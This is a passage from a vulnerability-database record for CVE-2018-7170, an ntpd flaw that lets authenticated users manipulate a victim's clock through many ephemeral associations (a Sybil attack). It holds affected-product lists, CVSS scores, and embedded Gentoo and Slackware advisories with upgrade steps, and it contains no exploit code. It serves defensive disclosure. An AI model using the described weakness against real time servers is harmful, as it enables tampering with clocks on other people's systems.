+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAlqYjI8ACgkQakRjwEAQIjM5rACfdDAWRxL2nQATj8HFDPgCVInK 13MAnR04OluKfiEsJVgO6uWJKXy2HOGq =FRx7 -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201803-1837", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.2.8" }, { "model": "hpux-ntp", "scope": "lt", "trust": 1.0, "vendor": "hpe", "version": "c.4.2.8.4.0" }, { "model": "diskstation manager", "scope": "gte", "trust": 1.0, "vendor": "synology", "version": "5.2" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.3.92" }, { "model": "virtual diskstation manager", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "6.1.6-15266" }, { "model": "vs960hd", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "2.2.3-1505" }, { "model": "skynas", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "6.1.5-15254" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "router manager", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "1.1.6-6931-3" }, { "model": "diskstation manager", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "6.1.6-15266" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.3.0" }, { "model": "solidfire", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "hci", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "router manager", "scope": "gte", "trust": 1.0, "vendor": "synology", "version": "1.1" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.2.0" }, { "model": "linux", "scope": null, "trust": 0.8, "vendor": "slackware", "version": null }, { "model": "vs960hd", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "virtual diskstation manager", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "diskstation manager", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.2.x" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.3.x" }, { "model": "skynas", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "router manager", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.3.92" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p7" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.2.2" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.2.4" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.2.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.90" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p7-rc2", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.1.2" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.70" }, { "model": "4.2.8p6", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p5", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p4", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p3-rc1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p385", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p22", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p203", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.0.a", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.0.90" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.92" }, { "model": "4.2.8p7", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p11", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null } ], "sources": [ { "db": "BID", "id": "103194" }, { "db": "JVNDB", "id": "JVNDB-2018-002748" }, { "db": "NVD", "id": "CVE-2018-7170" }, { "db": "CNNVD", "id": "CNNVD-201803-144" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.2.8", "versionStartIncluding": "4.2.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.3.92", "versionStartIncluding": "4.3.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:synology:diskstation_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.1.6-15266", "versionStartIncluding": "5.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:router_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.1.6-6931-3", "versionStartIncluding": "1.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:skynas:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.1.5-15254", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:virtual_diskstation_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.1.6-15266", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:synology:vs960hd_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.2.3-1505", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:synology:vs960hd:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:hci:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:hpe:hpux-ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "c.4.2.8.4.0", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2018-7170" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Matthew Van Gundy of Cisco ASIG, and Stefan Moser.", "sources": [ { "db": "BID", "id": "103194" } ], "trust": 0.3 }, "cve": "CVE-2018-7170", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2018-7170", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "VHN-137202", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "CVE-2018-7170", "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "LOW", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 1.6, "impactScore": 3.6, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 6.5, "baseSeverity": "Medium", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2018-7170", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2018-7170", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201803-144", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-137202", "trust": 0.1, "value": "LOW" }, { "author": "VULMON", "id": "CVE-2018-7170", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-137202" }, { "db": "VULMON", "id": "CVE-2018-7170" }, { "db": "JVNDB", "id": "JVNDB-2018-002748" }, { "db": "NVD", "id": "CVE-2018-7170" }, { "db": "CNNVD", "id": "CNNVD-201803-144" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim\u0027s clock via a Sybil attack. This issue exists because of an incomplete fix for CVE-2016-1549. ntp Contains data processing vulnerabilities and key management errors. NTP is prone to a remote security vulnerability. \nSuccessful exploits will allow attackers to bypass certain security restrictions and perform some unauthorized actions to the application. This may aid in further attacks. \nVersions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ntpd is one of the operating system daemons. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201805-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: May 26, 2018\n Bugs: #649612\n ID: 201805-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to remote code execution. \n\nBackground\n==========\n\nNTP contains software for the Network Time Protocol. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p11 \u003e= 4.2.8_p11 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n======\n\nA remote attacker could possibly execute arbitrary code or cause a\nDenial of Service condition. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p11\"\n\nReferences\n==========\n\n[ 1 ] CVE-2018-7170\n https://nvd.nist.gov/vuln/detail/CVE-2018-7170\n[ 2 ] CVE-2018-7182\n https://nvd.nist.gov/vuln/detail/CVE-2018-7182\n[ 3 ] CVE-2018-7183\n https://nvd.nist.gov/vuln/detail/CVE-2018-7183\n[ 4 ] CVE-2018-7184\n https://nvd.nist.gov/vuln/detail/CVE-2018-7184\n[ 5 ] CVE-2018-7185\n https://nvd.nist.gov/vuln/detail/CVE-2018-7185\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201805-12\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2018 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] ntp (SSA:2018-060-02)\n\nNew ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz: Upgraded. \n This release addresses five security issues in ntpd:\n * LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil vulnerability:\n ephemeral association attack. While fixed in ntp-4.2.8p7, there are\n significant additional protections for this issue in 4.2.8p11. \n Reported by Matt Van Gundy of Cisco. \n * INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909: ctl_getitem(): buffer\n read overrun leads to undefined behavior and information leak. \n Reported by Yihan Lian of Qihoo 360. \n * LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated\n ephemeral associations. Reported on the questions@ list. \n * LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric mode\n cannot recover from bad state. Reported by Miroslav Lichvar of Red Hat. \n * LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909: Unauthenticated packet\n can reset authenticated interleaved association. \n Reported by Miroslav Lichvar of Red Hat. \n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p11-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p11-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p11-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p11-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\n01c86ddfabec68d52877336258d064c7 ntp-4.2.8p11-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nb2d36d96f9a4d84df3586d38b8b47389 ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n78b4e9221e725dcb45160950bfc926d0 ntp-4.2.8p11-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne0d32ed484e02ad28c59838e6407d549 ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n81690d8e511b403f0fe89c1d120f5049 ntp-4.2.8p11-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nd2c877e3d1b9c7ce003ef090c7610c74 ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nc3ee95d3944b09c2e891883dc5411a6f n/ntp-4.2.8p11-i586-1.txz\n\nSlackware x86_64 -current package:\nfa9c7a8aca0c769791e34a8e48e6d260 n/ntp-4.2.8p11-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p11-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAlqYjI8ACgkQakRjwEAQIjM5rACfdDAWRxL2nQATj8HFDPgCVInK\n13MAnR04OluKfiEsJVgO6uWJKXy2HOGq\n=FRx7\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2018-7170" }, { "db": "JVNDB", "id": "JVNDB-2018-002748" }, { "db": "BID", "id": "103194" }, { "db": "VULHUB", "id": "VHN-137202" }, { "db": "VULMON", "id": "CVE-2018-7170" }, { "db": 